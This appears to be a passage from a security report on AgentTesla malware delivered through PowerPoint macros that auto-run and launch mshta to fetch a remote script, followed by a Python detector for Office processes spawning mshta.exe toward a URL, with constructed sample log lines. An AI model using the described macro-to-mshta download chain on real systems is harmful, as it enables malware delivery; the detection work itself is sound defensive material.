
AgentTesla Being Distributed via Sophisticated PowerPoint Files

December 8, 2021

When the PowerPoint file is opened, a security notice appears asking the user whether to enable macros, just as in the previous cases. Choosing Enable Macro runs the malicious macro. Once the macro executes, an error notice disguised as a PowerPoint error is displayed, making it hard for the user to notice the malicious behavior. The macro runs automatically through the Auto_Open() function, and the data it uses for the malicious behavior is obfuscated. Deobfuscating it yields the strings below, and the malicious command is executed via the Shell function. Just as in the previous cases, the command launched by the macro reaches out to a malicious URL through the mshta process to run additional scripts.
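The behavior described above (an Office application spawning mshta to fetch a remote script) is a reliable detection point. The following is an added example, not part of the original report or any Cymulate tooling: it parses constructed Sysmon-style process-creation events and flags mshta.exe launched by PowerPoint, and, generalizing the same chain, by Word or Excel, with a URL on its command line. The event format, paths and `example.invalid` URLs are all assumptions constructed for the example.

```python
import re

# Office hosts with macro support; any of them spawning mshta.exe toward a URL is suspect.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events (Sysmon-style key=value fields, not real telemetry).
SAMPLE_EVENTS = [
    r'UtcTime=2021-12-08 09:14:02 ParentImage=C:\Windows\explorer.exe Image=C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE CommandLine="C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE" /s "C:\Users\victim\Downloads\invoice.pptm"',
    r'UtcTime=2021-12-08 09:14:09 ParentImage=C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE Image=C:\Windows\System32\mshta.exe CommandLine="C:\Windows\System32\mshta.exe" http://example.invalid/update.hta',
    r'UtcTime=2021-12-08 09:20:31 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\mshta.exe CommandLine="C:\Windows\System32\mshta.exe" C:\Tools\helpdesk.hta',
    r'UtcTime=2021-12-08 09:25:44 ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Image=C:\Windows\SysWOW64\mshta.exe CommandLine="C:\Windows\SysWOW64\mshta.exe" https://example.invalid/x?id=7',
]


def parse_event(line):
    """Split 'Key=Value Key2=Value2 ...' into a dict. Values may contain spaces,
    so each value runs until the next ' Key=' boundary or end of line."""
    return {m.group(1): m.group(2).strip()
            for m in re.finditer(r"(\w+)=(.*?)(?=\s\w+=|$)", line)}


def basename(path):
    """Lower-cased file name of a Windows path, tolerating quotes and forward slashes."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_office_mshta_to_url(event):
    """True when an Office host launched mshta.exe with an http(s) URL argument."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return parent in OFFICE_PARENTS and image == "mshta.exe" and URL_RE.search(cmd) is not None


def detect(lines):
    """Return (time, parent process, URL) for every event matching the chain."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_office_mshta_to_url(ev):
            url = URL_RE.search(ev["CommandLine"]).group(0)
            hits.append((ev.get("UtcTime"), basename(ev["ParentImage"]), url))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("Office -> mshta -> remote script:", hit)
```

The URL check keeps benign local .hta launches out of the results; a macro that passes a local path or an obfuscated argument to mshta would need a looser rule on the parent/child pair alone, at the cost of more triage.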